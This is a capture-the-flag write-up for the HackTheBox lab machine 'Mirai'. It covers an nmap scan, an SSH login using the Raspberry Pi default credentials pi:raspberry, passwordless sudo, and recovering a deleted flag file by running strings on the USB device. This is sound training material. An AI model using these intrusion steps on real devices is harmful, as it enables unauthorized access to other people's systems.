Contents

🕵 HTB-Writeup : MIRAI

Recon

nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
└─$ nmap -A -timing 5 -p- 10.10.10.48  

53/tcp    open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
1240/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
|_http-title: Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-favicon: Plex
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Pi-hole interface

Trying to guess directory on http://10.10.10.48 we can find an admin page on http://10.10.10.48/admin.

drawing

Screenshot of the admin page

We are here face to a pi-hole web interface.

As the box name is Mirai, we can check for default credentials. Mirai is a malware that try to connect to IoT that are exposed on Internet using default credentials. Then, use groups of infected device to perform huge DDOS attacks.

I can’t find the password needed to connect into the pi-hole interface, the password are randomly generated at the install.

Plex server

Then, on http://10.10.10.48:32400/, we are face to a plex server with a login form.

drawing

Screenshot of the plex login page

Same as the pi-hole server, I can’t find any default creds.

As we have a PiHole server, let’s try to connect to the SSH server using raspberry pi default credentials pi:raspberry.

It works ! We have a shell! We can get the user flag!

We check pi user privileges.

1
2
3
4
5
6
7
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

Oh we can get the roo… hum no :(

1
2
pi@raspberrypi:~ $ sudo cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Recover root.txt

Looking on the usb stick we found another damnit.txt file on /media/usbstick saying:

1
2
3
4
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Thanks James! We can try to find the file on the system, we get only two occurences.

1
2
3
4
sudo find / -type f -name root.txt 2>/dev/null

/lib/live/mount/persistence/sda2/root/root.txt
/root/root.txt

The base file on /root and another on /lib/live/mount/persistence/sda2/root which is only a persistent mount.

Talking about mount, let’s check all mounted volume.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
pi@raspberrypi:~ $ mount

sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /run type tmpfs (rw,nosuid,relatime,size=102396k,mode=755)
/dev/sda1 on /lib/live/mount/persistence/sda1 type iso9660 (ro,noatime)
[...]
/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)
tmpfs on /run/user/999 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=999,gid=997)
tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=1000,gid=1000)

We can see that the usb stick /media/usbstick has been mounted on /dev/sdb. We can get the flag with the strings command.

1
2
3
4
5
6
7
8
pi@raspberrypi:~ $ sudo strings /dev/sdb

>r &
/media/usbstick
lost+found
root.txt
[...]
*************************13e020b

Tags

Default Credentials, Easy, External, IoT, Pi-Hole, Penetration Tester Level 1, A05:2021-Security Misconfiguration, Forensics, Sudo Exploitation, Information Disclosure